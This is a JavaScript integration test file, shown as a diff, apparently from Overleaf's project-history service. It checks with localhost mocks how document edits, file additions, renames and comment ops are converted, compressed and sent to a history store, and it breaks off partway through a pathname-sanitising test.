expect } from 'chai' +import Settings from '@overleaf/settings' +import assert from 'node:assert' +import async from 'async' +import crypto from 'node:crypto' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockFileStore = () => nock('http://127.0.0.1:3009') +const MockWeb = () => nock('http://127.0.0.1:3000') + +// Some helper methods to make the tests more compact +function slTextUpdate(historyId, doc, userId, v, ts, op) { + return { + projectHistoryId: historyId, + doc: doc.id, + op, + v, + + meta: { + user_id: userId, + ts: ts.getTime(), + pathname: doc.pathname, + doc_length: doc.length, + }, + } +} + +function slAddDocUpdate(historyId, doc, userId, ts, docLines, ranges = {}) { + return { + projectHistoryId: historyId, + pathname: doc.pathname, + ranges, + docLines, + doc: doc.id, + meta: { user_id: userId, ts: ts.getTime() }, + } +} + +function slAddDocUpdateWithVersion( + historyId, + doc, + userId, + ts, + docLines, + projectVersion, + ranges = {} +) { + const result = slAddDocUpdate(historyId, doc, userId, ts, docLines, ranges) + result.version = projectVersion + return result +} + +function slAddFileUpdate(historyId, file, userId, ts, projectId) { + return { + projectHistoryId: historyId, + pathname: file.pathname, + url: `http://127.0.0.1:3009/project/${projectId}/file/${file.id}`, + file: file.id, + ranges: undefined, + meta: { user_id: userId, ts: ts.getTime() }, + } +} + +function createdBlobFileUpdate(historyId, file, userId, ts, projectId) { + return { + projectHistoryId: historyId, + pathname: file.pathname, + createdBlob: true, + url: null, + file: file.id, + hash: file.hash, + ranges: undefined, + meta: { user_id: userId, ts: ts.getTime() }, + } +} + +function slRenameUpdate(historyId, doc, userId, ts, pathname, newPathname) { + return { + projectHistoryId: historyId, + pathname, + new_pathname: newPathname, + doc: doc.id, + meta: { user_id: userId, ts: ts.getTime() }, + } +} + +function olUpdate(doc, userId, ts, operations, v) { + return { + v2Authors: [userId], + timestamp: ts.toJSON(), + authors: [], + operations, + v2DocVersions: { + [doc.id]: { + pathname: doc.pathname.replace(/^\//, ''), // Strip leading / + v: v || 1, + }, + }, + } +} + +function olTextOperation(doc, textOperation) { + return { + pathname: doc.pathname.replace(/^\//, ''), // Strip leading / + textOperation, + } +} + +function olAddCommentOperation(doc, commentId, pos, length) { + return { + pathname: doc.pathname.replace(/^\//, ''), // Strip leading / + commentId, + ranges: [{ pos, length }], + } +} + +function olTextUpdate(doc, userId, ts, textOperation, v) { + return olUpdate(doc, userId, ts, [olTextOperation(doc, textOperation)], v) +} + +function olTextUpdates(doc, userId, ts, textOperations, v) { + return olUpdate( + doc, + userId, + ts, + textOperations.map(textOperation => olTextOperation(doc, textOperation)), + v + ) +} + +function olRenameUpdate(doc, userId, ts, pathname, newPathname) { + return { + v2Authors: [userId], + timestamp: ts.toJSON(), + authors: [], + + operations: [ + { + pathname, + newPathname, + }, + ], + } +} + +function olAddDocUpdate(doc, userId, ts, fileHash, rangesHash = undefined) { + const update = { + v2Authors: [userId], + timestamp: ts.toJSON(), + authors: [], + + operations: [ + { + pathname: doc.pathname.replace(/^\//, ''), // Strip leading / + file: { + hash: fileHash, + }, + }, + ], + } + if (rangesHash) { + update.operations[0].file.rangesHash = rangesHash + } + return update +} + +function olAddDocUpdateWithVersion( + doc, + userId, + ts, + fileHash, + version, + rangesHash = undefined +) { + const result = olAddDocUpdate(doc, userId, ts, fileHash, rangesHash) + result.projectVersion = version + return result +} + +function olAddFileUpdate(file, userId, ts, fileHash) { + return { + v2Authors: [userId], + timestamp: ts.toJSON(), + authors: [], + + operations: [ + { + pathname: file.pathname.replace(/^\//, ''), // Strip leading / + file: { + hash: fileHash, + }, + }, + ], + } +} + +describe('Sending Updates', function () { + const historyId = new ObjectId().toString() + + beforeEach(function (done) { + this.timestamp = new Date() + + ProjectHistoryApp.ensureRunning(error => { + if (error) { + return done(error) + } + this.userId = new ObjectId().toString() + this.projectId = new ObjectId().toString() + this.docId = new ObjectId().toString() + + this.doc = { + id: this.docId, + pathname: '/main.tex', + length: 5, + } + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: historyId, + }) + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { + history: { + id: historyId, + }, + }, + }) + ProjectHistoryClient.initializeProject(historyId, done) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + describe('basic update types', function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + snapshot: {}, + changes: [], + }, + }, + }) + }) + + it('should send add doc updates to the history store', function (done) { + const fileHash = '0a207c060e61f3b88eaee0a8cd0696f46fb155eb' + + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, 'a\nb') + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddDocUpdate(this.doc, this.userId, this.timestamp, fileHash), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdate( + historyId, + this.doc, + this.userId, + this.timestamp, + 'a\nb' + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should send ranges to the history store', function (done) { + const fileHash = '49e886093b3eacbc12b99a1eb5aeaa44a6b9d90e' + const rangesHash = 'fa9a429ff518bc9e5b2507a96ff0646b566eca65' + + const historyRanges = { + trackedChanges: [ + { + range: { pos: 4, length: 3 }, + tracking: { + type: 'delete', + userId: 'user-id-1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ], + comments: [ + { + ranges: [{ pos: 0, length: 3 }], + id: 'comment-id-1', + }, + ], + } + + // We need to set up the ranges mock first, as we will call it last.. + const createRangesBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${rangesHash}`, historyRanges) + .reply(201) + + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, 'foo barbaz') + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddDocUpdate( + this.doc, + this.userId, + this.timestamp, + fileHash, + rangesHash + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdate( + historyId, + this.doc, + this.userId, + this.timestamp, + 'foo barbaz', + { + changes: [ + { + op: { p: 4, d: 'bar' }, + metadata: { + ts: 1704067200000, + user_id: 'user-id-1', + }, + }, + ], + comments: [ + { + op: { + p: 0, + c: 'foo', + t: 'comment-id-1', + }, + metadata: { resolved: false }, + }, + ], + } + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been called to create content blob' + ) + assert( + createRangesBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been called to create ranges blob' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should strip non-BMP characters in add doc updates before sending to the history store', function (done) { + const fileHash = '11509fe05a41f9cdc51ea081342b5a4fc7c8d0fc' + + const createBlob = MockHistoryStore() + .put( + `/api/projects/${historyId}/blobs/${fileHash}`, + 'a\nb\uFFFD\uFFFDc' + ) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddDocUpdate(this.doc, this.userId, this.timestamp, fileHash), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdate( + historyId, + this.doc, + this.userId, + this.timestamp, + 'a\nb\uD800\uDC00c' + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should send text updates to the history store', function (done) { + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate(this.doc, this.userId, this.timestamp, [3, '\nc', 2]), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [{ p: 3, i: '\nc' }] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should send renames to the history store', function (done) { + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olRenameUpdate( + this.doc, + this.userId, + this.timestamp, + 'main.tex', + 'main2.tex' + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slRenameUpdate( + historyId, + this.doc, + this.userId, + this.timestamp, + '/main.tex', + '/main2.tex' + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should not get file from filestore if no url provided', function (done) { + const file = { + id: new ObjectId().toString(), + pathname: '/test.png', + contents: Buffer.from([1, 2, 3]), + hash: 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74', + } + + const fileStoreRequest = MockFileStore() + .get(`/project/${this.projectId}/file/${file.id}`) + .reply(200, file.contents) + + const checkBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${file.hash}`) + .reply(200) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddFileUpdate(file, this.userId, this.timestamp, file.hash), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + createdBlobFileUpdate( + historyId, + file, + this.userId, + this.timestamp, + this.projectId + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + !fileStoreRequest.isDone(), + 'filestore should not have been called' + ) + + assert( + checkBlob.isDone(), + `HEAD /api/projects/${historyId}/blobs/${file.hash} should have been called` + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/latest/files should have been called` + ) + done() + } + ) + }) + + it('should send add file updates to the history store', function (done) { + const file = { + id: new ObjectId().toString(), + pathname: '/test.png', + contents: Buffer.from([1, 2, 3]), + hash: 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74', + } + + const fileStoreRequest = MockFileStore() + .get(`/project/${this.projectId}/file/${file.id}`) + .reply(200, file.contents) + + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${file.hash}`, file.contents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddFileUpdate(file, this.userId, this.timestamp, file.hash), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddFileUpdate( + historyId, + file, + this.userId, + this.timestamp, + this.projectId + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + fileStoreRequest.isDone(), + `/project/${this.projectId}/file/${file.id} should have been called` + ) + assert( + createBlob.isDone(), + `/api/projects/${historyId}/latest/files should have been called` + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/latest/files should have been called` + ) + done() + } + ) + }) + + it('should send a stub to the history store when the file is large', function (done) { + const fileContents = Buffer.alloc(Settings.maxFileSizeInBytes + 1, 'X') + const fileSize = Buffer.byteLength(fileContents) + + const fileHash = crypto + .createHash('sha1') + .update('blob ' + fileSize + '\x00') + .update(fileContents, 'utf8') + .digest('hex') + + const file = { + id: new ObjectId().toString(), + pathname: '/large.png', + contents: fileContents, + hash: fileHash, + } + + const stubContents = [ + 'FileTooLargeError v1', + 'File too large to be stored in history service', + `id project-${this.projectId}-file-${file.id}`, + `size ${fileSize} bytes`, + `hash ${fileHash}`, + '\0', // null byte to make this a binary file + ].join('\n') + + const stubHash = crypto + .createHash('sha1') + .update('blob ' + Buffer.byteLength(stubContents) + '\x00') + .update(stubContents, 'utf8') + .digest('hex') + + const stub = { + id: file.id, + pathname: file.pathname, + contents: stubContents, + hash: stubHash, + } + + const fileStoreRequest = MockFileStore() + .get(`/project/${this.projectId}/file/${file.id}`) + .reply(200, file.contents) + + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${stub.hash}`, stub.contents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddFileUpdate(stub, this.userId, this.timestamp, stub.hash), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddFileUpdate( + historyId, + file, + this.userId, + this.timestamp, + this.projectId + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + addFile.isDone(), + `/api/projects/${historyId}/latest/files should have been called` + ) + assert( + createBlob.isDone(), + `/api/projects/${historyId}/latest/files should have been called` + ) + assert( + fileStoreRequest.isDone(), + `/project/${this.projectId}/file/${file.id} should have been called` + ) + done() + } + ) + }) + + it('should handle comment ops', function (done) { + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olUpdate(this.doc, this.userId, this.timestamp, [ + olTextOperation(this.doc, [3, '\nc', 2]), + olAddCommentOperation(this.doc, 'comment-id-1', 3, 2), + ]), + olUpdate( + this.doc, + this.userId, + this.timestamp, + [olAddCommentOperation(this.doc, 'comment-id-2', 2, 1)], + 2 + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [ + { p: 3, i: '\nc' }, + { p: 3, c: '\nc', t: 'comment-id-1' }, + ] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 2, + this.timestamp, + [{ p: 2, c: 'b', t: 'comment-id-2' }] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should be able to process lots of updates in batches', function (done) { + const BATCH_SIZE = 500 + const createFirstChangeBatch = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate( + this.doc, + this.userId, + this.timestamp, + ['a'.repeat(BATCH_SIZE), 6], + BATCH_SIZE - 1 + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + const createSecondChangeBatch = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate( + this.doc, + this.userId, + this.timestamp, + ['a'.repeat(50), BATCH_SIZE + 6], + BATCH_SIZE - 1 + 50 + ), + ]) + return true + }) + .query({ end_version: 500 }) + .reply(204) + // these need mocking again for the second batch + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: BATCH_SIZE, + history: { + snapshot: {}, + changes: [], + }, + }, + }) + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { + history: { + id: historyId, + }, + }, + }) + + const pushChange = (n, cb) => { + this.doc.length += 1 + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, this.doc, this.userId, n, this.timestamp, [ + { p: 0, i: 'a' }, + ]), + cb + ) + } + + async.series( + [ + cb => { + async.times(BATCH_SIZE + 50, pushChange, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createFirstChangeBatch.isDone(), + `/api/projects/${historyId}/changes should have been called for the first batch` + ) + assert( + createSecondChangeBatch.isDone(), + `/api/projects/${historyId}/changes should have been called for the second batch` + ) + done() + } + ) + }) + }) + + describe('compressing updates', function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + snapshot: {}, + changes: [], + }, + }, + }) + }) + + it('should concat adjacent text updates', function (done) { + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate( + this.doc, + this.userId, + this.timestamp, + [3, 'foobaz', 2], + 2 + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [ + { p: 3, i: 'foobar' }, + { p: 6, d: 'bar' }, + ] + ), + cb + ) + this.doc.length += 3 + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 2, + this.timestamp, + [{ p: 6, i: 'baz' }] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should take the timestamp of the first update', function (done) { + const timestamp1 = new Date(this.timestamp) + const timestamp2 = new Date(this.timestamp.getTime() + 10000) + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate( + this.doc, + this.userId, + timestamp1, + [3, 'foobaz', 2], + 2 + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, this.doc, this.userId, 1, timestamp1, [ + { p: 3, i: 'foo' }, + ]), + cb + ) + this.doc.length += 3 + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, this.doc, this.userId, 2, timestamp2, [ + { p: 6, i: 'baz' }, + ]), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should not concat updates more than 60 seconds apart', function (done) { + const timestamp1 = new Date(this.timestamp) + const timestamp2 = new Date(this.timestamp.getTime() + 120000) + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate(this.doc, this.userId, timestamp1, [3, 'foo', 2], 1), + olTextUpdate(this.doc, this.userId, timestamp2, [6, 'baz', 2], 2), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, this.doc, this.userId, 1, timestamp1, [ + { p: 3, i: 'foo' }, + ]), + cb + ) + this.doc.length += 3 + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, this.doc, this.userId, 2, timestamp2, [ + { p: 6, i: 'baz' }, + ]), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should not concat updates with different user_ids', function (done) { + const userId1 = new ObjectId().toString() + const userId2 = new ObjectId().toString() + + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate(this.doc, userId1, this.timestamp, [3, 'foo', 2], 1), + olTextUpdate(this.doc, userId2, this.timestamp, [6, 'baz', 2], 2), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, this.doc, userId1, 1, this.timestamp, [ + { p: 3, i: 'foo' }, + ]), + cb + ) + this.doc.length += 3 + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, this.doc, userId2, 2, this.timestamp, [ + { p: 6, i: 'baz' }, + ]), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should not concat updates with different docs', function (done) { + const doc1 = { + id: new ObjectId().toString(), + pathname: '/doc1.tex', + length: 10, + } + const doc2 = { + id: new ObjectId().toString(), + pathname: '/doc2.tex', + length: 10, + } + + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate(doc1, this.userId, this.timestamp, [3, 'foo', 7], 1), + olTextUpdate(doc2, this.userId, this.timestamp, [6, 'baz', 4], 2), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, doc1, this.userId, 1, this.timestamp, [ + { p: 3, i: 'foo' }, + ]), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, doc2, this.userId, 2, this.timestamp, [ + { p: 6, i: 'baz' }, + ]), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should not send updates without any ops', function (done) { + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + // These blank ops can get sent by doc-updater on setDocs from Dropbox that don't change anything + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + !createChange.isDone(), + `/api/projects/${historyId}/changes should not have been called` + ) + done() + } + ) + }) + + it('should not send ops that compress to nothing', function (done) { + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [{ i: 'foo', p: 3 }] + ), + cb + ) + this.doc.length += 3 + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 2, + this.timestamp, + [{ d: 'foo', p: 3 }] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + !createChange.isDone(), + `/api/projects/${historyId}/changes should not have been called` + ) + done() + } + ) + }) + + it('should not send ops from a diff that are blank', function (done) { + this.doc.length = 300 + // Test case taken from a real life document where it was generating blank insert and + // delete ops from a diff, and the blank delete was erroring on the OL history from + // a text operation like [42, 0, 512], where the 0 was invalid. + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdates(this.doc, this.userId, this.timestamp, [ + [ + 87, + -1, + 67, + '|l|ll|}\n\\hline', + -4, + 30, + ' \\hline', + 87, + ' \\\\ \\hline', + 24, + ], + ]), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [ + { + p: 73, + d: '\\begin{table}[h]\n\\centering\n\\caption{My caption}\n\\label{my-label}\n\\begin{tabular}{lll}\n & A & B \\\\\nLiter t up & 2 & 1 \\\\\nLiter Whiskey & 1 & 2 \\\\\nPris pr. liter & 200 & 250\n\\end{tabular}\n\\end{table}', + }, + { + p: 73, + i: '\\begin{table}[]\n\\centering\n\\caption{My caption}\n\\label{my-label}\n\\begin{tabular}{|l|ll|}\n\\hline\n & A & B \\\\ \\hline\nLiter t up & 2 & 1 \\\\\nLiter Whiskey & 1 & 2 \\\\\nPris pr. liter & 200 & 250 \\\\ \\hline\n\\end{tabular}\n\\end{table}', + }, + ] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should not concat text updates across project structure ops', function (done) { + const newDoc = { + id: new ObjectId().toString(), + pathname: '/main.tex', + hash: '0a207c060e61f3b88eaee0a8cd0696f46fb155eb', + docLines: 'a\nb', + } + + MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${newDoc.hash}`) + .reply(201) + + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate( + this.doc, + this.userId, + this.timestamp, + [3, 'foo', 2], + 1 + ), + olAddDocUpdate(newDoc, this.userId, this.timestamp, newDoc.hash), + olTextUpdate( + this.doc, + this.userId, + this.timestamp, + [6, 'baz', 2], + 2 + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [ + { p: 3, i: 'foobar' }, + { p: 6, d: 'bar' }, + ] + ), + cb + ) + this.doc.length += 3 + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdate( + historyId, + newDoc, + this.userId, + this.timestamp, + newDoc.docLines + ), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 2, + this.timestamp, + [{ p: 6, i: 'baz' }] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should track the doc length when splitting ops', function (done) { + this.doc.length = 10 + + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate(this.doc, this.userId, this.timestamp, [3, -3, 4], 1), + olTextUpdate( + this.doc, + this.userId, + this.timestamp, + [3, 'barbaz', 4], + 2 + ), // This has a base length of 10 + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [ + { p: 3, d: 'foo' }, + { p: 3, i: 'bar' }, // Make sure the length of the op generated from this is 7, not 10 + ] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 2, + this.timestamp, + [{ p: 6, i: 'baz' }] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) + + describe('with bad pathnames', function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + snapshot: {}, + changes: [], + }, + }, + }) + }) + + it('should replace \\ with _ and workaround * in pathnames', function (done) { + const doc = { + id: this.doc.id, + pathname: '\\main.tex', + hash: 'b07b6b7a27667965f733943737124395c7577bea', + docLines: 'aaabbbccc', + length: 9, + } + + MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${doc.hash}`) + .reply(201) + + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddDocUpdate( + { id: doc.id, pathname: '_main.tex' }, + this.userId, + this.timestamp, + doc.hash + ), + olRenameUpdate( + { id: doc.id, pathname: '_main.tex' }, + this.userId, + 